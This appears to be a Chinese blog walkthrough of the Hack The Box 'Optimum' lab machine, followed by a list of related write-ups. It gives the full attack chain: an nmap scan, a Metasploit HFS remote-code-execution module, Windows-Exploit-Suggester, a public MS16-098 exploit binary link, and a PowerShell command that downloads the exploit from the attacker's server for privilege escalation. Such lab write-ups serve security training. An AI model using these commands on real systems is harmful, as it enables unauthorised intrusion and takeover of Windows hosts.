hack the box optimum靶机
首先打开靶场,直接nmap开扫。
nmap -sV -Pn -A 10.10.10.8
通过扫描结果知道开启了80端口,80端口跑了HFS服务。顺势去msf搜索一下HFS有哪些漏洞
search hfs
使用下面的hfs的命令执行,然后看下要配置哪些东西
use 1
options
需要配置好远程主机,本地主机,配置好,run。多run几次,前面几次容易失败,而且要等挺久的。
set RHOSTS 10.10.10.8
set LHOSTS 10.10.14.17
run
利用成功后,返回meterpreter。然后看下当前文件夹的文件。能看到user的flag
可以直接读取user.txt.txt或者进入shell,读取user.txt.txt
#直接读取
cat user.txt.txt
接着继续找,看能不能进administrator文件夹,发现不能,而且也不能新建用户。
想着直接用msf的提权,但是执行后没有获得权限。那么我们应该怎么提权呢?看下打了哪些补丁。systeminfo还是能执行的。
拿到这个信息后,使用Windows-Exploit-Suggester脚本对比,看下突破点。(这个地方我怎么跑这个脚本都不行,说xlrd报错,这个脚本是用python2写的,大家注意。)
地址为https://git哈布.com/AonCyberLabs/Windows-Exploit-Suggester。使用方法看一下readme就行。记得是python2而且要装xlrd。
将远端的systeminfo信息复制下来,然后使用下面这条命令对比
python2 windows-exploit-suggester.py --database 2021-04-21-mssb.xls --systeminfo sysinfo.txt
对比结果能发现可以使用MS16–098提权。可以通过这个链接获取提权的exe。
https://git哈布.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
下载后,在exe文件夹下启动一个本地的http服务器
python3 -m http.server 888
然后在靶机的shell中执行以下命令
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17:888/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
这个命令的意思是下载10.10.14.17上面的41020.exe,然后放在后面的位置下面。
在对应位置找到,然后执行41020.exe,顺利拿到最高权限
去到users/administrator/desktop下面拿到root.txt,搞定。
后记:发现前面的users.txt不难,但是在后面提权过程中就涉及到了python2环境等问题,很麻烦。特别是Windows-Exploit-Suggester脚本执行的不成功,我那段是直接参考了别人的内容,大家可以自己试试。特别kali似乎不带pip2,可以参考后面的链接。
参考链接
https://ranakhalil101.medium.com/hack-the-box-optimum-writeup-w-o-metasploit-3a912e1c488c
pip2安装的链接可以参考:
https://www.cnblogs.com/lzkalislw/p/15579620.html
hack the box optimum靶机相关推荐
- Hack the box -- Responder靶机
这个靶机记录一下..感觉会用到. 任务1 当使用IP地址访问web服务时,我们被重定向到的域是什么? 这里我们访问一下ip,然后重定向了 FLAG:unika.htb 任务2 服务器上使用哪种脚本语言 ...
- Hack The Box——Traverxec
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 内核提权 SUID提权 总结 简介 这个靶机还算比较简单,只需一步一步慢慢走下去就可以完成了.漏洞发现和利用都比较简单,使用已知漏洞可以直接获得we ...
- Hack The Box靶机——Ambassador
文章目录 前言 一.Web部分 二.提权部分 前言 难度:中等,Hack The Box网站在线靶机.本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consu ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限
Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...
- Hack The Box - Starting Point - TIER 0
Hack The Box - Starting Point - TIER 0 Meow TASK 1 What does the acronym VM stand for? 首字母缩略词 VM 代表什 ...
- hack the box explore
今天来继续打靶,hack the box的explore 拿到目标先扫描么,看看开了那些端口和服务 碰到个没开80端口的服务器 EnterNet/IP: 设备可以用户数据报协议(UDP)的隐式报文传送 ...
- Hack The Box,一款有意思的渗透测试平台
前言 Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法.它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的 ...
- 【Hack The Box】linux练习-- SneakyMailer
HTB 学习笔记 [Hack The Box]linux练习-- SneakyMailer
最新文章
- 拆位 ---- C. Johnny and Another Rating Drop[位运算,计算每一位的贡献+推导过程]
- 精通python能干什么-Python学到什么程度才算精通?天津Python培训
- mysql的左连接应用
- WPF自定义控件之列表滑动特效 PowerListBox
- 获取php服务器ip地址,PHP获取客户端和服务器IP地址
- c++不好可以学qt吗_普通人可以学Python吗
- 没有样式重置_我不能没有的5个Vue.js库
- ibm websphere oracle weblogic,对比平台--WebLogic与WebSphere之间的区别
- 2021年中国中端婴儿车和婴儿车市场趋势报告、技术动态创新及2027年市场预测
- Java EE互联网轻量级框架整合开发
- BI系统的分布式部署原理和技术实现
- 每月一书(202104):《浪潮之巅》
- Css3中align-content,css align-content属性怎么用
- C语言int类型转换为char类型
- ppt倒计时器制作方法
- 诺基亚7原生android,诺基亚7.1喜提Android10系统更新
- [NFC] 读羊城通卡片信息
- 根据上面的products列表写一个循环,不断询问用户想买什么,用户选择一个商品编号,就把对应的商品添加到购物车里,终用户输入q退出时,打印购买的商品列表。
- Excel如何批量将中文名字翻译为英文
- 基于C#开发的《彩色连珠》小游戏